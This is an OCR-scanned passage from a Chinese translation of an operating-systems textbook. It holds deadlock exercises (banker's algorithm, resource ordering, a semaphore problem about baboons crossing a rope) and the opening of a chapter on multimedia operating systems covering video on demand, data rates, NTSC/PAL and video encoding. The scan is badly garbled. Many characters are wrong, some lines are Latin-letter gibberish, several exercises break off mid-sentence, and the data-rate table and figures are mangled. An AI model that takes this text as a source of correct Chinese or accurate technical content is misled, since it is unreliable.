22. 一 个 系统 有 4 个 进程 和 5 个 可 分 配 资产， 当前 分 配 和 最 大 需求 如 
下 : 


己 分 配 资 源 | 最 大 需求 量 | 可 用 资源 


进程 A 
进程 B 
进程 C 
进程 D 


香 保 持 该 状态 是 安全 状态 ，x 的 最 小 值 是 多 少 ? 


23. 一 个 消除 环 路 等 待 的 方法 是 用 规则 说 明 一 个 进程 在 任意 时 刻 只 
能 得 到 一 个 资源 。 举 例 说 明 在 很 多 情况 下 这 个 限制 是 不 可 接受 的 。 


24. 两 个 进程 A 和 B， 每 个 进程 都 需要 数据 库 中 的 3 个 记录 1、2、 
3。 如 采 A 和 B 都 以 1、2、3 的 次 序 请求， 将 不 会 发 生死 锁 。 但 是 如 果 B 
以 3、2、1 的 次 序 请 求 ， 那 么 死 锁 殊 有 可 能 会 发 生 。 对 于 这 3 种 资源 ， 
每 个 进程 共有 3! (Ble) 种 次 序 请 求 ， 这 些 组 合 中 有 多 大 的 可 能 可 以 
保证 不 会 发 生死 锁 ? 


25. 一 个 使 用 信箱 的 分 布 式 系统 有 两 条 IPC 原 语 : send 和 receive 。 
receive 原 语 用 于 指定 从 哪个 进程 授 收 消息 ， 并 且 如 果 指 定 的 进程 没有 
可 用 消 筷 ， 即 使 有 从 其 他 进程 发 来 的 消息 ， 该 进程 也 等 待 。 不 存在 共 


26. 在 一 个 电子 资金 转账 系统 中 ， 有 很 多 相同 进程 按 如 下 方式 工 
作 : 每 一 进程 读 取 一 行 输入 ， 该 输入 给 出 一 定数 目的 款项 、 贷 方 账 
户 、 借 方 账 户 。 然 后 该 进程 锁定 两 个 账户 ， 传 送 这 笔 钱 ， 完 成 后 释放 
锁 。 由 于 很 多 进程 并 行 运行 ， 所 以 存在 这 样 的 危险 : 锁定 x 会 无 法 锁定 
y， 因 为 y 已 被 一 个 正在 等 待 x 的 进程 锁定 。 设 计 一 个 方案 来 避免 死 锁 。 
在 没有 完成 事务 处 理 前 不 要 释放 该 账户 记录 。 ( 换 句 话说 ， 在 锁定 一 
个 账户 时 ， 如 采 发 现 男 一 个 账户 不 能 被 锁定 号 立即 释放 这 个 已 锁定 的 
WP 


27. 一 种 预防 死 锁 的 方法 是 去 除 占 有 和 等 竺 条件 。 在 本 书 中 ， 假 设 
在 请 求 一 个 新 的 资源 以 前 ， 进 程 必须 释放 所 有 它 已 经 占有 的 资源 〈 假 
设 这 是 可 能 的 ) 。 然 而 ， 这 样 做 会 引入 这 样 的 危险 性 : 使 竞争 的 进程 
得 到 了 者 的 资源 但 却 丢 失 了 原 有 的 货源 。 请 给 出 这 一 方法 的 改进 。 


28. 计 算 机 系 学 生 想到 了 下 面 这 个 消除 死 锁 的 方法 。 当 某 一 进程 请 
求 一 个 资源 时 ， 规 定 一 个 时 间 限 。 如 果 进 程 由 于 得 不 到 需要 的 资源 而 
阻塞 ， 定 时 套 开 始 运行 。 当 超过 时 间 限 时 ， 进 程 会 被 释放 掉 ， 并 且 人 多 
许 该 进程 重新 运行 。 如 果 你 是 教授 ， 你 会 给 这 样 的 学 生 多 少 分 ? 为 什 


AT 


29. 解 释 死 锁 、 活 锁 和 饥饿 的 区 别 。 


30.Cinderella 和 Prince 要 离婚 ， 为 分 割 财产 ， 他 们 商定 了 以 下 算 
法 。 每 天 早晨 每 个 人 发 男 给 对 方 律师 和 要求 财产 中 的 一 项 。 由 于 邮递 信 
件 需要 一 天 的 时 间 ， 他 们 商定 如 果 发 现在 同一 天 两 人 请 求 了 同一 项 财 
产 ， 第 二 天 他 们 会 发 信 取 消 这 一 要 求 。 他 们 的 财产 包括 狗 Woofer、 
Woofer 的 狗 屋 、 金 丝 省 Tweeter 和 Tweeter 的 鸟 笼 。 由 于 这 些 动物 喜爱 它 
们 的 房屋 ， 所 以 又 商定 任何 将 动物 和 它们 房屋 分 开 的 方案 都 无 效 ， 且 
整个 分 配 从 头 开始 。Cinderella 和 Prince 都 非常 想 要 Woofer。 于 是 他 们 
分 别 去 度假 ， 并 且 每 人 都 编写 程序 用 一 台 个 人 计算 机 处 理 这 一 谈判 工 
作 。 当 他 们 度假 回来 时 ， 发 现 计 算 机 仍 在 谈判 ， 为 什么 ? 产生 死 锁 了 
吗 ? EUIR TID? 请 讨论 。 


31. 一 个 主 修 人 类 学 、 辅 修 计 算 机 科学 的 学 生 参加 了 一 个 研究 课 
题 ， 调 查 电 否 可 以 教会 非洲 独 独 理解 死 锁 。 他 找到 一 处 很 深 的 峡谷 ， 
在 上 边 固 定 了 一 根 横 跨 峡谷 的 绳索 ， 这 样 狮 独 惑 可 以 冤 住 绳索 越过 峡 
合 。 同 一 时 刻 ， 只 要 袁 着 相同 的 方向 束 可 以 有 几 只 独 儿 通过。 但 如 果 
向 东 和 向 西 的 独 独 同时 攀 在 绳索 上 那么 会 产生 死 锁 ( 锋 狂 会 被 卡 在 中 
间 ) ， 因 为 它们 无 法 在 绳索 上 从 另 一 只 的 背 上 翻 过 去 。 如 果 一 只 独 狂 
想 越过 峡 合 ， 它 必须 看 当前 是 否 有 别 的 独 独 正在 寺 回 通行 。 利 用 信和 号 
量 编写 一 个 避免 死 锁 的 程序 来 解决 该 问题 。 不 考虑 连续 东 行 的 儿 独 会 
使 得 西行 的 狮 狮 无 限制 地 等 待 的 情况 。 
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来 到 绳索 跟前 ， 但 发 现 有 别 的 独 独 正在 疝 西 越过 峡 合 时 ， 它 会 一 直 等 
到 绳索 可 用 为 止 。 但 在 至 少 有 一 只 独 独 问世 越过 峡谷 之 前 ， 不 允许 再 
有 和 独 独 开始 从 东 同 西 越过 上 峡 合 。 


33. 编 写 银行 家 算法 的 模拟 程序 。 该 程序 应 该 能 够 循环 检查 每 一 个 
提出 请 求 的 银行 客户 ， 并 且 能 判断 这 一 请 求 是 否 安全 。 请 把 有 关 请 求 
和 相应 决定 的 列表 输出 到 一 个 文件 中 。 


34. 写 一 个 程序 实现 每 种 类 型 多 个 货源 的 死 锁 检测 算法 。 你 的 程序 
应 该 从 一 个 文件 中 读 取 下 面 的 输入 : 进程 数 、 资 源 类 型 数 、 每 种 存在 
类 型 的 资源 数 EE) 、 当 前 分 配 和 矩阵 C (第 一 行 ， 接 着 第 二 行 ， 以 
此 类 推 、 需 求 矩 阵 R (第 一 行 ， 接 着 第 二 行 ， 以 此 类 推 ，。 你 的 程 
序 输出 应 表明 在 此 系统 中 是 否 有 死 锁 。 如 有 果 系 统 中 有 死 锁 ， 程 序 应 该 
打印 出 所 有 死 锁 的 进程 id 号 。 


35. 写 一 个 程序 使 用 资源 分 配 图 检测 系统 中 是 否 存在 死 锁 。 你 的 程 
序 应 该 从 一 个 文件 中 读 取 下 面 的 输入 : 进程 数 和 资源 数 。 对 每 个 进 
程 ， 你 应 该 读 取 4 个 数 : 进程 当前 持 有 的 资源 数 、 它 持 有 的 资源 的 
ID、 它 当前 请 求 的 资源 数 、 它 请 求 的 资源 ID。 程 序 的 输出 应 表明 在 此 
系统 中 是 否 有 死 锁 。 如 有 果 系 统 中 有 和 死 锁 ， 程 序 应 该 打印 出 所 有 死 锁 的 
进程 id 号 。 


第 7 革 ZS URAPRIE AS 


BUF HLS ` LEY Be A IEE H a ON AT Leo A at 
STAIR AR ATS ATT No UR LY Dae ee Ee, HEE 
需要 的 时 候 进 行 回放 。 音 频 和 视频 文件 的 特征 与 传统 的 文本 文件 存在 
很 大 的 差异 ， 而 目前 的 文件 系统 却 是 为 文本 文件 设计 的 。 因 此 ， 需 要 
设计 靳 型 的 文件 系统 来 处 理 音频 和 视频 文件 。 不 仅 如 此 ， 保 存 与 回放 
首 频 和 视频 同样 给 调度 程序 以 及 操作 系统 的 其 他 部 分 提出 了 新 的 要 
求 。 本 章 中 ， 我 们 将 研究 这 些 问 题 以 及 它们 与 设计 用 来 处 理 多 媒体 信 
轧 的 操作 系统 之 间 的 关系 。 


数字 电影 通 季 归 于 多 媒体 名 下 ， 多 媒体 的 字面 侣 义 征 一 种 以 上 的 
媒体 。 在 这 样 的 定义 下 ， 本 书 束 是 一 部 多 媒体 作品 ， 毕 竟 它 包含 了 两 
种 媒体 ， 文 本 和 图 像 (插图 ) 。 然 而 ， 大 多 数 人 使 用 “多 媒体 ”这 一 术 
语 时 所 指 的 是 包含 两 种 或 更 多 种 连续 媒体 的 文档 ， 连 续 媒 体 也 就 是 必 
须 能 够 在 某 一 时 间 间 隔 内 回放 的 媒体 。 本 书 中 ， 我 们 将 在 这 样 的 意义 
PEA RAS — RA © 


另 一 个 有 些 模糊 的 术语 是 “视频 ”。 在 技术 意义 上 ， 视 频 只 是 一 部 
电影 的 图 像 部 分 《相对 的 是 声音 部 分 ) 。 实 际 上 ， 摄 像 机 和 电视 机 通 
党 有 两 个 连接 右 ， 一 个 标 为 “视频 *， 一 个 标 为 “音频 *， 因 为 这 两 个 信和 号 
是 分 开 的 。 然 而 , “数字 视频 "这 一 术语 通 贡 指 的 是 完整 的 作品 ， 既 包 


含 图 像 也 包含 声 首 。 后 面 我 们 将 使 用 “电影 ”这 一 术语 指 完整 的 作品 。 
注意 ， 在 这 种 意义 下 一 部 电影 不 一 定 是 好 羔 志 以 超过 一 架 波 首 747 的 代 
价 制作 的 长 达 两 小 时 的 大 片 ， 一 段 通过 因特网 从 CNN 主 页 下 载 的 30 秒 
长 的 新 闻 剪 辑 在 这 一 定义 下 也 是 一 部 电影 。 当 我 们 提 到 非常 短 的 电影 
BY, ERRIAN ABIE” ° 


7.1 多 媒体 简介 


在 讨论 多 媒体 技术 之 前 ， 了 解 其 目前 和 将 来 的 用 法 可 能 有 助 于 对 
问题 的 理解 。 在 一 台 计 算 机 上 ， 多 媒体 通常 意味 着 从 数字 通用 光盘 
(Digital Versatile Disk, DVD) 播放 一 段 预 先 录 好 的 电影 。DVD 是 一 
种 光盘 ， 它 使 用 与 CD-ROM 相 同 的 120 mik H Ae, 18 
是 记录 密度 更 高 ， 容 量 在 5GB 到 17GB 之 间 (取决 于 记录 格式 ) ° 


有 两 个 候选 者 正在 竞争 成 为 DVD 的 后 继 者 。 一 个 是 Blu-ray (W 
光 ) 格式 ， 其 单 层 格 式 容 量 有 25GB ( 双 层 格式 有 50GB) 。 另 一 个 是 
HD DVD 格式 ， 其 单 层 格式 容量 有 15GB ( 双 层 格式 30GB) 。 每 一 种 格 
式 都 由 一 个 不 同 的 计算 机 和 电影 公司 的 财团 支持 。 显 然 ， 电 子 与 娱乐 
产业 非常 怀念 在 20 世 纪 70 年 代 到 80 年 代 Betamax 与 VHS 的 “格式 大 战 ”， 
因此 他 们 决定 重 现 这 场 战 争 。 毋 良 置 疑 ， 当 消费 者 等 着 看 哪 家 最 终 胜 
出 时 ， 这 两 个 系统 的 普及 也 会 因为 这 次 “格式 大 战 ? 而 推迟 好 几 年 。 


另 一 种 多 媒体 的 使 用 是 从 Intemet 上 下 载 视频 短片 。 许 多 网 页 都 有 
可 以 点 击 下 载 短片 的 栏目 。 像 YouTube 一 样 的 Web 站 点 有 成 千 上 万 可 供 
欣赏 的 视频 短片 。 随 着 有 线 电视 与 ADSI，( 非 对 称 数 字 用 户 环线 ) 的 普 
及 ， 更 快 的 发 布 技术 会 占据 市 场 ，Internet 中 的 视频 短片 将 会 像 火 箭 逢 
天 一 样 猛 增 。 


另 一 个 必须 文 持 多 媒体 的 领域 是 视频 本 吴 的 制作 。 目 前 有 许多 多 
媒体 编辑 系统 ， 这 些 系 统 需要 在 不 仅 文 持 传 统 作业 而 且 还 支持 多 媒体 
的 操作 系统 上 运行 ， 以 获得 最 好 的 性 能 。 


多 媒体 还 在 兄 一 个 领域 中 发 挥 春 越 来 越 重 要 的 作用 ， 这 束 是 计算 
机 游戏 。 计 算 机 游戏 经 党 要 运行 短暂 的 视频 豆 辑 来 摘 述 某 种 活动 。 这 
FOALS FR ra RA, (Eee, HEA Pe 
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当然 ， 游 戏 本 身 也 会 生成 大 量 的 动画 ， 不 过 ， 处 理 程序 生成 的 视频 与 
播放 一 段 电影 古 不 相同 的 。 


最 后 ， 多 媒体 世界 的 圣杯 是 视频 点 播 (video on demand) ， 这 意 
味 着 消费 者 能 够 在 家 中 使 用 电视 遥控 器 〈 或 鼠标 ) 选择 电影 ， 并 且 立 
刻 将 其 在 电视 机 (或 计算 机 显示 器 ;上 显示 出 来 。 视 频 点 播 要 求 有 特 
殊 的 基础 设施 才能 使 用 。 图 7-1 所 示 为 两 种 可 能 的 视频 点 播 基 础 设施 ， 
每 种 都 包含 二 个 基本 的 组 件 ， 一 个 或 多 个 视频 服务 大、 一 个 分 布 式 网 
络 以 及 一 个 在 每 个 房间 中 用 来 对 信号 进行 解码 的 机 顶 盒 。 视 频 服务 右 


(video server) 是 一 台 功 能 强大 的 计算 机 ， 在 其 文件 系统 中 存放 着 许 
多 电影 ， 并 且 可 以 按照 点 播 请 求 回放 这 些 电影 。 大 型 机 有 时 用 来 作为 
视频 服务 器 ， 因 为 大 型 机 连接 1000 个 大 容量 的 磁盘 是 一 件 轻而易举 的 
事情 ; 而 在 个 人 计算 机 上 连接 1000 个 容量 不 太 大 的 磁盘 也 是 一 件 很 困 
难 的 事情 。 在 本 章 后 续 各 节 中 ， 有 许多 材料 是 关于 视频 服务 器 及 其 操 
作 系统 的 。 


Ca Gel a 


同 轴 电缆 


b) 


图 7-1 视频 点 播 使 用 不 同 的 本 地 分 布 技术 : a)ADSL; b) 有 线 电视 


用 户 和 视频 服务 器 之 间 的 分 布 式 网 络 必须 能 够 高 速 实 时 地 传输 数 
据 。 这 种 网 络 的 设计 十 分 有 趣 也 十 分 复杂 ， 但 是 这 超出 了 本 书 的 苑 
围 。 我 们 不 想 更 多 地 讨论 分 布 式 网 络 ， 只 想 说 明 分 布 式 网 络 总 是 使 用 
光纤 从 视频 服务 器 连接 到 客户 居住 的 居民 点 的 汇 接 盒 。ADSL 系 统 是 
电话 公司 经 营 的 ， 在 ADSL 系 统 中 ， 现 有 的 双 绞 电话 线 提供 了 最 后 一 公 
里 的 数据 传输 。 有 线 电 视 古 由 有 线 电视 公司 经 营 的 ， 在 有 线 电 视 系统 
中 ， 现 有 的 有 线 电视 电 绑 用 于 信号 的 本 地 分 送 。ADSL 的 优点 是 为 每 个 
用 户 提供 了 专用 数据 通道 ， 因 此 市 宽 有 保证 ， 但 是 由 于 现 有 电话 线 的 
局 限 其 带宽 比较 低 〈 只 有 几 Mb/s) 。 有 线 电 视 使 用 高 带宽 的 同 轴 电 
绕 ， 带 宽 可 以 达到 几 Gb/s， 但 是 许多 用 户 必须 共 训 相同 的 电缆 ， 从 而 
导致 竞争 ， 对 于 每 个 用 户 来 说 之 沉 没有 祭 证 。 不 过 ， 为 了 与 有 线 电视 
竞争 ， 电 话 公司 正 在 为 住户 铺设 光缆 ， 这 样 ， 光 缆 上 的 ADSL 将 比 电视 
电弧 有 更 大 的 市 宽 。 


系统 的 最 后 一 部 分 是 机 顶 盒 (set-top box) ， 这 是 ADSL 或 电视 电 
线 终 结 的 地 方 。 机 项 盒 实际 上 就 是 普通 的 计算 机 ， 只 不 过 其 中 包含 特 
殊 的 蕊 厂 用 于 视频 解码 和 解压 缩 。 机 顶 盒 最 少 要 包 合 CPU、RAM ` 
ROM、 与 ADSL 或 电视 电缆 的 接口 ， 以 及 用 于 跟 电 视 机 连接 的 端子 。 


机 顶 盒 的 称 代 品 是 使 用 客户 现 有 的 PC 机 并 且 在 显示 套 上 显示 电 
影 。 十 分 有 趣 的 是 ， 大 多 数 客户 可 能 都 已 经 其 有 一 台 计 算 机 ， 为 什么 
还 要 考虑 机 顶 盒 呢 ， 这 是 因为 视频 点 播 的 运营 商 认 为 人 们 更 愿意 在 起 


届 宇 中 看 电影 ， 而 起 居室 中 通 币 放 有 电视 机 ， 很 少 有 计算 机 。 从 技术 
角度 看 ， 使 用 个 人 计算 机 代替 机 顶 盒 更 有 道理 ， 因 为 计算 机 的 功能 
加 强大 ， 拥 有 大 容量 的 磁盘 ， 并 且 拥 有 更 高 分 辨 率 的 显示 器 。 不 管 采 
用 的 是 机 顶 盒 还 是 个 人 计算 机 ， 在 解码 并 显示 电影 的 用 户 端 ， 我 们 通 
党 部 要 区 分 视频 服务 器 和 客户 机 进程 。 然 而 ， 以 系统 设计 的 观 操 ， 客 
户 机 进程 是 在 机 顶 盒 上 运行 还 是 在 PC 机 上 运行 并 没有 太 大 的 关系 。 对 
于 桌面 视频 编 错 系统 而 言 ， 所 有 的 进程 都 运行 在 相同 的 计算 机 上 ， 但 
苹 我 们 将 继续 使 用 服务 器 和 客户 这 样 的 术语 ， 以 便 搞 清 苞 哪 个 进程 正 
在 做 什么 事情 。 


回 到 多 媒体 本 身 ， 要 想 成 功 地 处 理 多 媒体 则 必须 很 好 地 理解 它 所 
具有 的 两 个 关键 特征 : 


1) 多 媒体 使 用 极 高 的 数据 率 。 


2) 多 媒体 要 求实 时 回放。 


高 数据 率 来 自视 觉 与 听觉 信息 的 本 性 。 了 眼睛 和 耳 打 每 秒 可 以 处 理 
巨大 数量 的 信息 ， 必 须 以 这 样 的 速率 为 眼睛 和 征 示 提供 信息 才能 产生 
可 以 接受 的 观察 体验 。 图 7-2 列 举 了 几 种 数字 多 媒体 源 和 茶 些 剃 见 硬件 
设备 的 数据 率 。 在 本 章 后 面 我 们 将 讨论 这 些 编码 格式 。 需 要 注意 的 
征 ， 多 媒体 需要 的 数据 率 越 高 ， 则 越 需要 进行 压缩 ， 并 且 需 要 的 存储 
量 也 就 越 大 。 例 如 ， 一 部 未 压缩 的 2 小 时 长 的 HDTV 电 影 将 填 满 一 个 


570GB 的 文件 。 存 放 1000 部 这 种 电影 的 视频 服务 器 需要 570TB 的 磁盘 空 
间 ， 按 照 目 前 的 标准 这 可 是 难以 想象 的 数量 。 还 需要 注意 的 是 ， 没 有 
数据 压缩 ， 目 前 的 硬件 不 可 能 跟 上 这 样 的 数据 率 。 我 们 将 在 本 章 后 面 
讨论 视频 压缩 。 


| 数据 源 _Mbps | GB/hr 设备 Mbps 
| 电话 (PCM) | 0064 0.03 | | 快速 以 太 网 100 
MP3 音 乐 i 0.14 | 0.06| EIDEM | 433 
音频 CD | 14 | 0.62 | |ATM OC-3 网 络 156 
|IMPEG-2 电 影 (640X480) | 4 1.76 | | IEEE 1394b(FireWire) | 800 
数字 便携 式 摄像 机 (720X480) | 25 11 FAM | 1000 | 
未 压缩 电视 (640 X 480) 221 97 SATA fe it 3000 
未 压缩 HDTV (1280x720) | 648 | 288 | |SCSIUltra-640 磁 盘 “| 5120 


图 7-2 某 些 多 媒体 和 高 性 能 VO 设 备 的 数据 率 (1 Mbps=106 位 / 秒 ， 
1 GB=230 字 节 ) 


多 媒体 对 系统 提出 的 第 二 个 要 求 是 需要 实时 数据 传输 。 数 字 电 影 
的 视频 部 分 每 秒 包 含 某 一 数目 的 帧 。 北 美 、 南 美和 日 本 采用 的 NTSC 制 
式 每 秒 包 含 30 帧 “对 纯粹 主义 者 而 言 是 29.97 帧 ) ， 世 界 上 其 他 大 部 分 
地 区 采用 的 PAL 和 SECAM 制 式 每 秒 包 含 25 帧 (对 纯粹 主义 者 而 言 是 
25.00 帧 ) 。 帧 必须 分 别 以 33.3ms 或 40ms 的 精确 时 间 间 隔 传输 ， 否 则 电 
影 看 起 来 将 会 有 起 伏 。 


NTSC 代 表 美 家 电视 标准 委员 会 (National Television Standards 
Committee) ,但 是 当 彩 色 电 视 发 明 时 将 彩色 引入 该 标准 的 拙劣 方法 产 


生 了 业界 的 一 个 笑话 ， 戏 称 NTSC 代 表决 不 复 现 相同 的 颜色 (Never 
Twice the Same Color) 。PAL 代 表 相 位 交错 排列 (Phase Alternating 
Line) ， 它 是 技术 上 最 好 的 制式 。 SECAM 代 表 顺 序 与 存储 彩色 
(SEquentiel Couleur Avec Memoire) ， 该 制式 被 法 国 采用 ， 意 在 保护 
法 国 的 电视 制造 商 免 受 国外 竞争 。SECAM 还 被 东欧 国家 所 采用 。 


耳 末 比 眼 睛 更 加 敏感 ， 传 输 时 间 中 即使 存在 儿 之 秒 的 变动 也 会 被 
察觉 到 。 传 输 率 的 变动 称 为 颤动 (jitter) ， 必 须 严 格 限 制 颤 动 以 获得 
展 好 的 性 能 。 注 意 ， 辣 动 不 同 于 延迟 。 如 果 图 7-1 中 的 分 布 式 网 络 均匀 
地 将 所 有 的 位 准确 地 延迟 5s， 电 影 将 开始 得 稍稍 晚 一 些 ， 但 是 看 起 来 
却 不 错 。 但 从 另 一 方面 来 说 ， 如 果 分 布 式 网 络 在 100~200ms 之 间 随 机 
地 延迟 各 帧 ， 那 么 不 论 是 谁 主 演 的 电影 ， 看 起 来 都 像 是 查理 ， 卓 别 林 
的 老 片 。 


让 人 可 以 接受 地 回放 多 炬 体 所 要 求 的 实时 性 通 肖 通 过 服务 质量 
(quality of service) 参数 来 描述 ， 这 些 参数 包括 可 用 平均 带宽 、 可 用 
峰值 带宽 、 最 小 和 最 大 延 退 〈 两 者 一 起 限制 了 颤动 ) 以 及 位 丢失 概 
率 。 例 如 ， 网 络 运营 两 提供 的 服务 可 以 保证 4 Mbps 的 平均 市 席 、105 一 
110ms 时 间 间 隅 之 内 999% 的 传输 延迟 以 及 102 的 位 丢失 概率 ， 那 么 这 样 
的 服务 质量 对 于 MPEG-2 电 影 来 说 是 非 甫 好 的 。 网 络 运 理 商 还 可 以 提供 
价格 更 为 低廉 等 级 也 比较 低 的 服务 ， 例 如 平均 带 视 为 1 Mbps (如 


ADSL) ， 在 这 种 情况 下 ， 服 务 质量 就 不 得 不 打 些 折扣 ， 可 能 是 降低 分 
辨 率 、 降 低 帆 率 或 者 是 放弃 凑 色 信息 以 黑 日 方式 播放 电影 。 


提供 服务 质量 保证 的 最 常见 的 方法 是 预 完 为 每 一 个 新 到 的 客户 预 
留 容量 ， 预 留 的 资源 包括 CPU、 内 存 缓冲 区 、 磁 盘 传输 容量 以 及 网 络 
带宽 。 如 果 一 位 新 的 客户 到 来 并 且 想 观 看 一 部 电影 ， 但 是 视频 服务 侨 
或 网 络 计算 出 不 具有 为 另 一 位 客户 提供 服务 的 容量 ， 那 么 它 将 拒绝 新 
的 客户 ， 以 避免 降低 同 当 前 客户 提供 的 服务 质量 。 因 此 ， 多 媒体 服务 
器 需要 有 资源 预 留 方案 和 进入 控制 算法 (admission control 
algorithm) ， 以 判定 什么 时 候 能 够 处 理 更 多 的 任务 。 


7.2 ”多 尹 体 文件 


在 大 多 数 系 统 中 ， 普 通 的 文本 文件 由 字 节 的 线性 序列 组 成 ， 没 有 
操作 系统 了 解 或 关心 的 任何 结构 。 对 于 多 媒体 而 言 ， 情 况 束 复杂 多 
了 。 上 自 先 ， 视 频 与 音频 是 完全 不 同 的。 它们 由 不 同 的 设备 捕获 (视频 
为 CCD 忌 片 ， 首 频 为 麦克 风 ) ， 具 有 不 同 的 内 部 结构 (视频 每 秒 有 25 
一 30 帧 ， 音 频 每 秒 有 44 100 个 样本 ) ， 并 且 它 们 通过 不 同 的 设备 来 回放 


CHL Nas, OAD Hae) 。 


Uh, KA BUSI EET NES TE ALR, TAN 
众 大 多 不 讲 英 语 。 这 一 情况 有 两 种 处 理 方法 。 对 于 某 些 国家 ， 需 要 产 
生 一 个 额外 的 声音 扫 迹 ， 用 当地 语言 进行 配音 ， 但 是 不 包含 音效 。 在 
日 本 ， 所 有 的 电视 部 具有 两 个 声 道 ， 电 视 观 众 看 外 国 影片 时 可 以 听 原 
声 语言 也 可 以 听 日 请， 遥控 船上 有 一 个 按钮 可 以 用 来 进行 语言 选择 。 
在 其 他 国家 中 ， 使 用 的 是 原始 的 声音 轨迹 ， 配 以 当地 语言 的 字幕 。 


除 此 之 外 ， 许 多 在 电视 中 播放 的 电影 现在 也 提供 英文 字幕 ， 使 讲 
英语 但 是 听力 较 弱 的 人 可 以 观看 。 绪 采 ， 数 字 电 影 实 际 上 可 能 由 多 个 
文件 组 成 ， 一 个 视频 文件 、 多 个 音频 文件 以 及 多 个 包含 各 种 语言 字幕 
的 文本 文件 。 DVD 能 够 存放 至 多 32 种 语言 的 字幕 文件 。 简 单 的 一 组 多 
媒体 文件 如 图 7-3 所 示 ， 我 们 将 在 本 章 后 面 解释 快 进 和 快 倒 的 含义 。 


视频 


法 语音 频 
德语 音频 
英语 字幕 


3 ello, ice ice day re is ow are you rea you 
ti [ Dag. Bob | Dag. Aice | mooie dag | Jazeker [Hoe gaathet] pma | Eni | coea | 
til 下 
tf 5 
LESA AK p ` 
图 7-3 电影 可 能 由 若干 文件 组 成 


因此 ， 文 件 系 统 需 要 跟踪 每 个 文件 的 多 个 “ 子 文件 ”*”。 一 种 可 能 的 
方案 是 像 传统 的 文件 一 样 管理 每 个 子 文件 BAN, EAT RR ERR SC 
件 的 块 ) ， 并 且 要 有 一 个 新 的 数据 结构 列 出 每 个 多 媒体 文件 的 全 部 子 
文件 。 男 一 方法 是 创造 一 种 二 维 的 i 节点， 使 每 一 列 列 出 每 个 子 文件 的 
全 部 块 。 一 般 而 言 ， 其 组 织 必 须 能 够 使 观众 观看 电影 时 可 以 动态 地 选 
择 使 用 哪个 音频 及 字幕 轨迹 。 


在 各 种 情况 下 ， 还 必须 有 保持 子 文件 同步 的 某 种 方法 ， 这 样 才能 
保证 当选 中 的 音频 轨迹 回放 时 与 视频 保持 同步 。 如 打 音 频 与 视频 存在 


即使 古 轻 微 的 不 同步 ， 观 众 可 能 会 在 演员 的 嘴唇 运动 之 前 或 之 后 才 听 
到 他 说 的 话 ， 这 很 容易 察觉 到 ， 相 当 让 人 扫兴 。 


为 了 更 好 地 理解 多 媒体 文件 古 如 何 组 织 的 ， 有 必要 在 某 种 细 市 程 
度 上 了 解数 字音 频 与 数字 视频 是 如 何 工作 的 ， 下 面 我 们 将 介绍 这 些 主 


题 。 


7.2.1 ”视频 编码 


人 类 的 眼睛 具有 这 样 的 特性 ， 当 一 幅 图 像 内 现在 视网膜 上 时 ， 在 
它 衰 退 之 前 将 保持 儿 毫 秒 的 时 间 。 如 果 一 个 图 像 序列 以 每 秒 50 或 更 多 
张 图 像 内 现 ， 眼 睛 就 不 会 注意 到 它 看 到 的 是 不 连续 的 图 像 。 所 有 基于 
视频 或 影片 胶片 的 运动 图 像 系统 部 利用 了 这 一 原理 产生 活动 的 画面 。 


要 想 理解 视频 系统 ， 最 好 从 简单 且 过 时 的 黑 日 电视 开始 。 为 了 将 
二 维 图 像 表示 为 作为 时 间 函 数 的 一 维 电压 ， 摄 像 机 用 一 个 电子 束 对 图 
像 进行 横向 扫描 并 绥 慢 地 向 下 移动 ， 记 杂 下 电子 束 经 过 处 光 的 强度 。 
在 扫描 的 终点 处 ， 电 子 束 折 回 ， 称 为 一 帧 (frame) 。 这 一 作为 时 间 画 
数 的 区 的 强度 以 广播 方式 传播 出 去 ， 接 收 机 则 重复 扫描 过 程 以 重 构图 
像 。 摄 像 机 与 接收 机 采用 的 扫描 模式 如 图 7-4 所 示 。 (CCD 摄 像 机 的 成 
像 方式 是 积分 而 非 扫 朱 ， 但 生 某 些 摄 像 机 及 所 有 的 CRT 显 示 吉 采 用 的 都 
十 扫描 方式 。) 


下 一 场 的 屏幕 上 画 出 的 
扫描 线 起 始 处 扫描 线 


水 平 折 回 。 折 回 i 
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图 7-4 NTSC 视 频 和 电视 使 用 的 扫描 模式 


精确 的 扫描 参数 随 国家 的 不 同 而 有 所 不 同 。 NTSC 有 525 条 扫描 
线 ， 水 平 与 垂直 方向 的 纵横 比 为 4:3， 每 秒 为 30 (实际 为 29.97) Wi o Kr 
洲 的 PAL 和 SECAM 制 式 有 625 条 扫 拉线 ， 纵 横 比 也 是 4:3， 每 秒 为 25 
帧 。 在 两 种 制式 中 ， 顶 端 和 底 端 的 几 条 线 是 不 显示 的 (为 的 是 在 原始 
的 圆 形 CRT 上 显示 一 个 近似 矩形 的 图 像 ，。525 条 NTSC 扫 描 线 中 只 显 
示 483 条 ，625 条 PAL/SECAM 扫 描 线 中 只 显示 576 条 。 


虽然 每 秒 25 帧 足以 捕获 平 消 的 运动 ， 但 是 在 这 样 的 帧 率 下 ， 有 许 
多 人 特别 是 老年 人 会 感觉 到 图 像 内 烁 “因为 新 的 图 像 尚未 出 现 以 前 旧 
的 图 像 就 已 经 在 视网膜 上 消失 ) 。 增 加 帧 率 就 会 对 稀缺 的 带宽 提出 更 


多 的 要 求 ， 因 此 要 采取 不 同 的 方法 。 这 一 方法 不 是 按 从 上 到 下 的 顺序 
显示 扫描 线 ， 而 是 首先 显 示 所 有 的 奇数 扫描 线 ， 接 着 再 显示 所 有 的 偶 
数 扫 描 线 。 此 处 的 半 帧 称 为 一 个 场 (field) 。 实 验 表 明 ， 尽 管 人 们 在 每 
秒 25 帧 时 感觉 到 闪烁， 但 是 在 每 秒 50 场 时 却 感觉 不 到 。 这 一 技术 被 称 
为 隅 行 扫 描 (interlacing) 。 非 隔行 扫描 的 电视 或 视频 被 称 为 逐 行 扫描 


(progressive) 。 


彩色 视频 采用 与 单 色 ( 黑 日 ) 视频 相同 的 扫描 模式 ， 只 不 过 使 用 
了 三 个 同时 运动 的 电子 束 而 不 是 一 个 运动 电子 束 来 显示 图 像 ， 对 于 
27. ` SAE (RGB) 这 三 个 加 性 原色 中 的 每 一 颜色 使 用 一 个 电子 束 。 
这 一 技术 能 够 工作 是 因为 任何 颜色 都 可 以 由 红 、 绿 和 蓝 以 适当 的 强度 
线性 县 加 而 构造 出 来 。 然 而 ， 为 了 在 一 个 信道 上 进行 传输 ， 三 个 彩色 


言 号 必须 组 合成 一 个 复合 《composite) 信和 号。 


为 了 使 黑 日 接收 机 可 以 显示 传输 的 彩色 电视 科目 ，NTSC、PAL 和 
SECAM 三 种 制式 均 将 RGB 信 号 线性 组 合 为 一 个 亮度 (uminance) 信号 
